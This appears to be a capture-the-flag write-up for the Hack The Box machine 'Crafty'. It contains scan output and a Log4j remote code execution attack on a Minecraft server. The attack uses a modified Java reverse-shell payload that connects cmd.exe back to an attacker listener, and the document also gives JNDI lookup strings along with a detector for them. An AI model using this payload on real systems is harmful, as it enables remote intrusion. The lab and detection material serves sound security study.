Recon

#rce #log4j #htb #portfwd

Nmap Results

# Nmap 7.94 scan initiated Tue Feb 13 03:57:54 2024 as: nmap -p- --min-rate 5000 -sV -oN reports.nmap crafty.htb
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.039s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE   VERSION
80/tcp    open  http      Microsoft IIS httpd 10.0
25565/tcp open  minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 1/100)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 13 03:58:27 2024 -- 1 IP address (1 host up) scanned in 33.27 seconds

Dirsearch Results

# Dirsearch started Tue Feb 13 03:38:21 2024 as: /usr/share/dirsearch/dirsearch.py -u http://crafty.htb

301   144B   http://crafty.htb/js    -> REDIRECTS TO: http://crafty.htb/js/
403   312B   http://crafty.htb/%2e%2e//google.com
403   312B   http://crafty.htb/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
403   312B   http://crafty.htb/\..\..\..\..\..\..\..\..\..\etc\passwd
403   312B   http://crafty.htb/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
301   145B   http://crafty.htb/css    -> REDIRECTS TO: http://crafty.htb/css/
301   145B   http://crafty.htb/img    -> REDIRECTS TO: http://crafty.htb/img/
301   145B   http://crafty.htb/index.html    -> REDIRECTS TO: http://crafty.htb/home
403     1KB  http://crafty.htb/js/

User Flag log4j exploit

So we know port 25565 is open and identifies as a Minecraft server, version 1.16.5, which is affected by the vulnerability called "Log4j": a remote code execution bug in the Java logging library.

You can get the public exploit at: https://github.com/kozmer/log4j-shell-poc

Read through the exploit and edit it (the machine is Windows, and the exploit's RCE payload calls /bin/sh instead of cmd.exe, so we must change it).

Change String cmd="/bin/sh" to String cmd="cmd.exe" like this:

def generate_payload(userip: str, lport: int) -> None:
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {

    public Exploit() throws Exception {
        String host="%s";
        int port=%d;
        String cmd="cmd.exe";
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);
        InputStream pi=p.getInputStream(),
            pe=p.getErrorStream(),
            si=s.getInputStream();
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
        while(!s.isClosed()) {
            while(pi.available()>0)
                so.write(pi.read());
            while(pe.available()>0)
                so.write(pe.read());
            while(si.available()>0)
                po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try {
                p.exitValue();
                break;
            }
            catch (Exception e){
            }
        };
        p.destroy();

We got the flag (in our netcat listener). After that I moved to using msfvenom and msfconsole for an easier process.
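A defender-side complement to the attack above, added here as an example and not part of the original writeup or the kozmer PoC: a small detector that scans Minecraft server log lines (constructed samples, with a made-up 10.10.14.2 listener address) for the ${jndi:...} lookup that log4j 2 resolves, after collapsing the lower/upper and default-value nesting tricks commonly used to hide it.

```python
import re

# Constructed sample lines in Minecraft's server log format; two of them carry the
# lookup string that log4j 2 resolves (the plain form and a nested/obfuscated form).
SAMPLE_LOG = """\
[03:58:10] [Server thread/INFO]: steve joined the game
[03:58:31] [Server thread/INFO]: <steve> hello everyone
[03:59:02] [Server thread/INFO]: <alex> ${jndi:ldap://10.10.14.2:1389/a}
[03:59:40] [Server thread/INFO]: <alex> ${${lower:j}${upper:n}di:${::-l}dap://10.10.14.2:1389/b}
[04:00:05] [Server thread/INFO]: <steve> price is ${date:yyyy}
"""

# ${lower:x} / ${upper:x} case tricks and ${anything:-x} default-value tricks.
# Neither pattern can cross a brace, so only the innermost lookups match each pass.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(text: str) -> str:
    """Collapse the common lookup-obfuscation tricks until nothing changes."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(log_text: str) -> list[tuple[int, str]]:
    """Return (line number, normalised line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        normalised = normalise(line)
        if _JNDI.search(normalised):
            hits.append((number, normalised))
    return hits


if __name__ == "__main__":
    for number, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Detection complements patching: for 1.12 to 1.16.5 servers Mojang published a log4j2_112-116.xml configuration to pass with -Dlog4j.configurationFile=log4j2_112-116.xml in the server's JVM arguments.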

Root flag Portfwd

Go to the plugins folder in the server directory, get the Java plugin,
download it and decompile it using jd-gui.

And boom, we got the flag and root.
